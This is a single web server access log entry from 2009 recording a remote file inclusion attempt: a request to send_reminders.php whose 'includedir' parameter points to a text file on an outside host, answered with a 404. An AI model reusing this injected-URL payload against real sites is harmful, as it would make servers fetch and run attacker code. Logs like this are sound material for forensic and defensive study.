190.144.44.36 - - [11/Jun/2009:17:44:25 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
